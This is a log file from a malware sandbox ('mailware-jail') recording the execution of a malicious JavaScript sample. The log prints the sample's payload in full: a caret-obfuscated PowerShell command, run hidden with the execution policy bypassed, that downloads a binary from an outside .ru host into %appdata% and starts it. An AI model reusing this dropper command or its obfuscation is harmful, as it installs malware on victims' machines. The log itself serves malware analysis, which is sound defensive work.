malware/20161001/a6dfd6b83d46702c0b408bd5f669e08c785cd12fdd515fe469595e2a3d44ddc4.out

1 Oct 13:05:34 - mailware-jail, a malware sandbox ver. 0.6
1 Oct 13:05:34 - ------------------------
1 Oct 13:05:34 - Sandbox environment sequence: env/utils.js,env/eval.js,env/function.js,env/wscript.js,env/other.js,env/console.js
1 Oct 13:05:34 - Malware files: malware/20161001/a6dfd6b83d46702c0b408bd5f669e08c785cd12fdd515fe469595e2a3d44ddc4.js
1 Oct 13:05:34 - Output file for sandbox dump: sandbox_dump_after.json
1 Oct 13:05:34 - Output directory for generated files: output/
1 Oct 13:05:34 - ==> Preparing Sandbox environment.
1 Oct 13:05:34 -  => Executing: env/utils.js
1 Oct 13:05:34 -  => Executing: env/eval.js
1 Oct 13:05:34 - Preparing sandbox to intercept eval() calls.
1 Oct 13:05:34 -  => Executing: env/function.js
1 Oct 13:05:34 - Preparing sandbox to intercept 'new Function()' calls.
1 Oct 13:05:34 -  => Executing: env/wscript.js
1 Oct 13:05:34 - Preparing sandbox to emulate WScript environment.
1 Oct 13:05:34 -  => Executing: env/other.js
1 Oct 13:05:34 -  => Executing: env/console.js
1 Oct 13:05:34 - ==> Executing malware file(s).
1 Oct 13:05:34 -  => Executing: malware/20161001/a6dfd6b83d46702c0b408bd5f669e08c785cd12fdd515fe469595e2a3d44ddc4.js
1 Oct 13:05:34 - ActiveXObject(WScRipT.SHEll)
1 Oct 13:05:34 - Created: WScript.Shell[1]
1 Oct 13:05:34 - WScript.Shell[1].Run(cmD.EXE /c POWE^R^s^he^lL.eXE     -ExEc^U^Tio^n^p^oLIC^y^   B^Y^pas^S -NOpro^Fi^L^e^    -^W^InD^Ow^sT^yle^  HI^ddeN^  (^Ne^W^-^OBJ^ecT^     S^YST^EM.net.Webc^L^I^E^n^T^).^dOWn^L^Oa^d^fI^lE^(^'http://click.doubledating.ru/js/boxun4.bin','%appdatA%.exE')^;^stA^Rt-^p^rO^c^eS^s  ^'%aPpdata%.eXe', false, undefined)
1 Oct 13:05:34 - ==> Cleaning up sandbox.
1 Oct 13:05:34 - ==> Script execution finished, dumping sandbox environment to a file.
1 Oct 13:05:34 - The sandbox context has been  saved to: sandbox_dump_after.json